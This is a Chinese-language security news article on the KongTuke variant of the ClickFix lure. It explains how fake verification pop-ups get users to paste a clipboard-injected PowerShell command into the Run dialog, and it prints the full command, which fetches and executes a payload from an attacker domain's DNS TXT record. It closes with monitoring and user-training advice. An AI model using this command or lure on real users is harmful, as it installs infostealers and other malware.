“ClickFix” 社会工程学攻击活动迎来全新变种,该变种被命名为KongTuke。自 2025 年 12 月底起,这一变种被发现处于活跃传播状态,其显著特征是利用DNS TXT 记录存储并获取恶意载荷,成为该类攻击在规避检测手段上的一次重要转变。
“ClickFix” 攻击手法的典型操作,是攻陷正规网站或搭建虚假钓鱼页面,在页面中弹出带有欺骗性的 “人机验证” 或 “Chrome 浏览器更新” 弹窗。
与索要账户凭据的传统钓鱼攻击不同,ClickFix 会诱骗用户手动执行恶意程序。
该攻击的实施流程,是引导用户执行一系列特定操作,以 “修复问题” 或 “证明非机器人”:
- 按下 Windows 键 + R,打开运行对话框;
- 按下 Ctrl+V,将命令粘贴至输入框;
- 按下回车键执行命令。
当用户在网页上与虚假弹窗产生交互时,恶意命令会通过 JavaScript 脚本自动注入到用户的剪贴板中。
KongTuke 的 DNS 技术新手段
在 KongTuke 攻击活动中,剪贴板中的内容为一段 PowerShell 命令,其设计目的是从 DNS 记录中获取恶意代码,而非传统的从网页服务器加载。
近期的分析结果显示,被注入的命令遵循如下结构:
plaintext
powershell -w h -ep bypass -c "iex((Resolve-DnsName -Type TXT payload.bruemald.top -Server 8.8.8.8).Strings -join'')"
这段命令包含多项关键执行功能:
- -w h:隐藏 PowerShell 窗口,避免引起用户警觉;
- -ep bypass:绕过本地执行策略,允许恶意脚本运行;
- Resolve-DnsName:这是本次攻击的核心创新点。脚本不再通过 Invoke-WebRequest(wget/curl)从网址下载文件,而是查询受攻击者控制的域名(如 payload.bruemald.top)的 TXT 记录;
- -Server 8.8.8.8:强制通过谷歌公共 DNS 进行查询,绕过企业本地 DNS 的过滤机制或域名拦截策略,避免恶意域名在网络层面被阻断;
- iex:立即执行(Invoke-Expression)从 DNS TXT 记录中获取的文本字符串。
而虚假的人机验证弹窗,会引导用户将这段恶意 PowerShell 命令粘贴到 Windows 运行对话框中执行。
规避检测方式与攻击影响
攻击者将恶意载荷存储在 DNS TXT 记录中,避免了将恶意文件部署在网页服务器上,从而躲过 URL 过滤器或防火墙的扫描检测。
对于网络安全监控系统而言,这类操作产生的流量表现为向公共 DNS 解析器(8.8.8.8)发起的标准 DNS 查询,而这类请求在企业网络环境中通常是被允许的。
源码分析结果显示了被注入用户剪贴板的恶意 PowerShell 脚本的具体内容,该脚本执行后,会进一步获取第二阶段恶意载荷,这类载荷通常为信息窃取程序,或用于下载其他家族恶意软件的下载器。
承载这类 ClickFix 钓鱼页面的被攻陷域名(如已发现的emierich.com),往往能在被检测到前保持数天的活跃状态,原因在于其恶意内容仅会向特定访问者进行动态注入。
安全机构建议各企业:密切监控异常的 PowerShell 执行链,尤其是同时调用Resolve-DnsName和iex的操作行为;同时开展用户安全培训,明确告知用户 —— 正规的验证流程绝不会要求通过 Windows 运行对话框执行任何命令。
发表评论
您还未登录,请先登录。
登录